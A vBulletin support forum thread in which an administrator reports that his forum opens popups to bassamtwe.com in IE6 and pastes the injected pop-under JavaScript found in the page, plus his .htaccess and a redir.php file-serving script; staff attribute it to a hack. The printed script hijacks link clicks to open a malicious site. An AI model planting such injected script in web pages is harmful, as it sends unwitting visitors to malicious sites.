Bug on VB 3.6.12 ? bassamtwe.com

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • brasolino
    New Member
    • May 2007
    • 19
    • 3.6.x

    Bug on VB 3.6.12 ? bassamtwe.com

    I'm experiencing problems using vbulletin 3.6.12 with INTERNET EXPLORER [tested on IE6]

    When i try to access my forum using IE6, a new windows redirecting to

    Code:
    http://bassamtwe.com/cgi-bin/index.cgi?
    is opened and editing the final html code generated by vbulletin, i found this code on first string

    Code:
    <script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://bassamtwe.com/ld/ment/";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    someone can help me to solve it ?

    the site seems to be malicious

    Code:
    http://safeweb.norton.com/report/show?name=bassamtwe.com


    thank you!
  • Steve Machol
    Former Customer Support Manager
    • Jul 2000
    • 154488

    #2
    vB 3.6.12 is end-of-life and no longer officially supported. For support and maximum security you need to upgrade to the latest stable version of vB.

    However someone either hacked your server, or hacked your vB to put that redirect in the templates.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


    Comment

    • brasolino
      New Member
      • May 2007
      • 19
      • 3.6.x

      #3
      Originally posted by Steve Machol
      vB 3.6.12 is end-of-life and no longer officially supported. For support and maximum security you need to upgrade to the latest stable version of vB.

      However someone either hacked your server, or hacked your vB to put that redirect in the templates.
      ok, i have updated to vb 3.8.1 but the problem is still on my forum (spam pointed on other domain): how can i try to fix ?

      Comment

      • Steve Machol
        Former Customer Support Manager
        • Jul 2000
        • 154488

        #4
        That is either from a modification or you have a file on your server that is doing this redirect, possibly an .htaccess file.
        Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
        Change CKEditor Colors to Match Style (for 4.1.4 and above)

        Steve Machol Photography


        Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


        Comment

        • brasolino
          New Member
          • May 2007
          • 19
          • 3.6.x

          #5
          ok, this is the contento of .htaccess

          Code:
          RewriteEngine On
          
          RewriteRule ^((urllist|sitemap).*\.(xml|txt)(\.gz)?)$ vbseo_sitemap/vbseo_getsitemap.php?sitemap=$1 [L]
          
          
          
          ####Charset
          
          AddDefaultCharset Off 
          
          
          
          ####Gzip
          
          <IfModule mod_rewrite.c>
          
          RewriteCond %{REQUEST_FILENAME} -f
          
          RewriteRule ^(.*)(js|css)$ redir.php?file=$1$2&type=$2 [L]
          
          </IfModule>
          
          
          
          ####ETags
          
          FileETag None
          
          
          
          ####Expires
          
          <IfModule mod_expires.c>
          
          ExpiresActive On
          
          ExpiresByType image/gif A2592000
          
          ExpiresByType image/jpeg A2592000
          
          ExpiresByType image/png A2592000
          
          ExpiresByType application/x-shockwave-flash A2592000
          
          ExpiresByType text/css A2592000
          
          ExpiresByType application/x-javascript A2592000
          
          </IfModule>
          and this is the contento of redir.php

          Code:
          ?php 
          
          # this is the file redir.php, to gzip javascript and css
          
          
          
          # set the request file name
          
          $file=str_replace(chr(0x0),"",$_REQUEST['file']);
          
          $allowedfiles = array('js','gif','png','jpg','css','txt','swf');
          
          if (!in_array(str_replace(chr(0x2E),"",substr(chr(0x2E).$file,-3)),$allowedfiles)){ exit ("Hacking attempt!"); }
          
          
          
          # Set Expires, cache the file on the browse
          
          header("Expires:".gmdate("D, d M Y H:i:s", time()+15360000)."GMT");
          
          header("Cache-Control: max-age=315360000");
          
          
          
          # set the last modified time
          
          $mtime = filemtime($file);
          
          $gmt_mtime = gmdate('D, d M Y H:i:s', $mtime) . ' GMT';
          
          header("Last-Modified:" . $gmt_mtime);
          
          
          
          # output a mediatype header
          
          switch ($_REQUEST['type']){
          
            case 'css':
          
              header("Content-type: text/css");
          
              break;
          
            case 'js' :
          
              header("Content-type: text/javascript");
          
                break;
          
            default:
          
              header("Content-type: text/plain");
          
          }
          
          
          
          # GZIP the content
          
          if(extension_loaded('zlib')){ob_start();ob_start('ob_gzhandler');}
          
          
          
          # echo the file's contents
          
          echo implode('', file($file));
          
          
          
          if(extension_loaded('zlib')){
          
            ob_end_flush();
          
            # set header the content's length;
          
            # header("Content-Length: ".ob_get_length()); # (It doesn't work? )
          
            ob_end_flush();
          
          }
          
          ?>
          it's wrong ?

          Comment

          • Steve Machol
            Former Customer Support Manager
            • Jul 2000
            • 154488

            #6
            Temporarily remove or rename your .htaccess file and see if you still have this problem.
            Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
            Change CKEditor Colors to Match Style (for 4.1.4 and above)

            Steve Machol Photography


            Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


            Comment

            • brasolino
              New Member
              • May 2007
              • 19
              • 3.6.x

              #7
              Originally posted by Steve Machol
              Temporarily remove or rename your .htaccess file and see if you still have this problem.
              ok, i have removed .htaccess and the problem was gone, BUT NOW IS BACK!

              i'm using vbulletin 3.8.1 PL1: how can i find if the "trojan" is in the MYSQL database ? how can i search it ?

              thank you

              Comment

              • brasolino
                New Member
                • May 2007
                • 19
                • 3.6.x

                #8
                here is the analisys of the problem

                On 9 November 2008, a college university web page hosted obfuscated JavaScript that when decoded revealed an iframe to hxxp://amhvcketn.com/...

                Comment

                • Umut Ceylan
                  Senior Member
                  • Dec 2004
                  • 273
                  • 3.8.x

                  #9
                  hello
                  i've a same file but i find redir.php its YSLOW script man take it easy
                  regards
                  Last edited by Umut Ceylan; Wed 1 Jul '09, 12:43am.

                  Comment

                  widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                  Working...